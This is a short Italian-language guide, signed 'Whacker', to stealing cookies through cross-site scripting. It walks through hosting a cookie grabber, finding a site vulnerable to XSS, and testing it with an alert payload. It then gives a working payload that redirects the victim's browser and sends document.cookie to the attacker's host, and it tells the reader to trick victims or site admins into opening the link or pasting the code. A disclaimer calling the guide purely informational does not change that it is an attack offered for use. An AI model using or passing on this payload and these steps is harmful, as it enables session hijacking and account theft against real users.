Guida alle xss grabbanti

1) Hostate su un qualsiasi sito di vostra proprietà (per esempio altervista) un cookie grabber

2) Trovare un sito vulnerabile alle xss

3) Verificare se quando al posto di questo codice <script>alert(“quellochevuoi”)</script> (codice per fare una xss) mettete questo <script>alert(document.cookie)</script> esce un’alert con tutti dei numeri (quei numeri sarebbero i vostri cookie in quel sito)

4) Dopo aver verificato ciò cambiate la stringa in questo modo <script>document.location=”link_del_hosting/documents.php?c=”+document.cookie;</script>

5) A questo punto avete due possibilità se potete fare l’xss attraverso il link del sito potete dare direttamente alla vittima o all’admin del sito vulnerabile il link con il codice sopra indicato.Se invece non potete lavorare sul link dovrete dare il codice sopra indicato alla vittima o all’admin e farglielo inserire nella parte vulnerabile del sito come per esempio la barra delle ricerche

6) Appena la vittima aprirà il link o inserirà il codice i suoi cookie arriveranno a voi.

QUESTA GUIDA è SOLAMENTE A SCOPO PURAMENTE INFORMATIVO IO NON MI ASSUMO NESSUNA RESPONSABILITà SULL’USO CHE NE FATE

Se la copiate siete pregati di specificare la fonte

Guida By Whacker